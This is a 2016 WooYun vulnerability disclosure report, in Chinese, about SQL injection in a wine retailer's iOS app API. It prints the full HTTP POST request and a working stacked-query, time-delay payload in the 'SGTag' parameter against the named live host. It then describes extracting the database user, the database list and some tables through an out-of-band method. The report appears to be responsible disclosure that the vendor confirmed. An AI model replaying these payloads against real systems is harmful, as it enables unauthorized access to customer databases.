乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-04: 细节已通知厂商并且等待厂商处理中 2016-04-05: 厂商已经确认,细节仅向厂商公开 2016-04-15: 细节向核心白帽子及相关领域专家公开 2016-04-25: 细节向普通白帽子公开 2016-05-05: 细节向实习白帽子公开 2016-05-20: 细节向公众公开
APP安全之SQL注入
目标:中酒网IOS APP检测发现以下地方存在SQL注入:(注入参数SGTag,Stacked queries)
POST /getSGList HTTP/1.1Cookie: OZ_1U_1942=vid=v701fc95a46377.0&ctime=1459748111<ime=1459748078; OZ_1U_2203=vid=v701fc0d097a90.0&ctime=1459748381<ime=1459748115; OZ_1Y_2203=erefer=http%3A//pro.zhongjiu.cn/phone/20160219/s_sprgz.html&eurl=http%3A//pro.zhongjiu.cn/phone/20160323/s_mob.html&etime=1459748113&ctime=1459748381<ime=1459748115&compid=2203; _zjcd0=b00b3130-9a5f-40ea-8241-22674255974dContent-Length: 198Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://api1.zhongjiu.cn/getSGListHost: api1.zhongjiu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*appversion=4.2.7&charset=utf-8&mobilesize=iPhone8,1&mobileversion=9.3.1&OrderChannelPlat=1&SGTag=0&sign=6cbe3e477e7c232e697d9f607fc266cb303&sitetype=1&version=3
Payload:(延时3秒)
POST /getSGList HTTP/1.1Cookie: OZ_1U_1942=vid=v701fc95a46377.0&ctime=1459748111<ime=1459748078; OZ_1U_2203=vid=v701fc0d097a90.0&ctime=1459748381<ime=1459748115; OZ_1Y_2203=erefer=http%3A//pro.zhongjiu.cn/phone/20160219/s_sprgz.html&eurl=http%3A//pro.zhongjiu.cn/phone/20160323/s_mob.html&etime=1459748113&ctime=1459748381<ime=1459748115&compid=2203; _zjcd0=b00b3130-9a5f-40ea-8241-22674255974dContent-Length: 198Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://api1.zhongjiu.cn/getSGListHost: api1.zhongjiu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*appversion=4.2.7&charset=utf-8&mobilesize=iPhone8,1&mobileversion=9.3.1&OrderChannelPlat=1&SGTag=0;waitfor delay '0:0:3' -- -&sign=6cbe3e477e7c232e697d9f607fc266cb303&sitetype=1&version=3
由于时间盲注跑起来效率和性能都不好,于是使用cloudeye改为报错当前数据库用户
所有数据库
跑下前几个数据表,其他就不深入了
请多指教~
危害等级:高
漏洞Rank:20
确认时间:2016-04-05 09:46
感谢,我们会尽快修复
暂无